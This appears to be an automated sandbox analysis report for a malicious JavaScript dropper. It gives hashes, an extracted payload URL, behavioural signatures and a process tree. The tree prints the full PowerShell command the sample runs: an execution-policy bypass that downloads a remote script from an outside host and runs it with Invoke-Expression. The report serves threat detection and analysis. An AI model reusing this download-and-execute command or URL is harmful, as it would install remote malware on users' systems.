Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
05-03-2024 02:41
Static task
static1
Behavioral task
behavioral1
Sample
bcb732a5f458d792a47f2bd444d0c48d266db721f01450c539719a1e37653a13.js
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
bcb732a5f458d792a47f2bd444d0c48d266db721f01450c539719a1e37653a13.js
Resource
win10v2004-20240226-en
General
-
Target
bcb732a5f458d792a47f2bd444d0c48d266db721f01450c539719a1e37653a13.js
-
Size
67KB
-
MD5
00de3913fd5e4bb0d9284b180bfbd956
-
SHA1
6af05b012b8c828a42acf476a5e0332aa6c4bd9d
-
SHA256
bcb732a5f458d792a47f2bd444d0c48d266db721f01450c539719a1e37653a13
-
SHA512
f47a3cdd66286792fdde690268baa1f8b8776e3c619ceccd341421e4e63bfac26554db0f7b98b9ebba559b375d50a8498727bc7771d18b207fd1bf0c4255c684
-
SSDEEP
1536:RZd77OUymTHj+bKqlqH79yuZ0aENJUWGkcXu+1LKPuJ7yNkZ7FXTh:R/aUyaHjqqH7ouZHmJUWvQEPuJ7ySZ7n
Malware Config
Extracted
https://compactgrill.hu/care.txt
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 3 2136 powershell.exe 4 2136 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2136 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2136 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1728 wrote to memory of 2136 1728 wscript.exe 28 PID 1728 wrote to memory of 2136 1728 wscript.exe 28 PID 1728 wrote to memory of 2136 1728 wscript.exe 28
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\bcb732a5f458d792a47f2bd444d0c48d266db721f01450c539719a1e37653a13.js1⤵
- Suspicious use of WriteProcessMemory
PID:1728 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-Expression (New-Object Net.WebClient).DownloadString('https://compactgrill.hu/care.txt')"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2136
-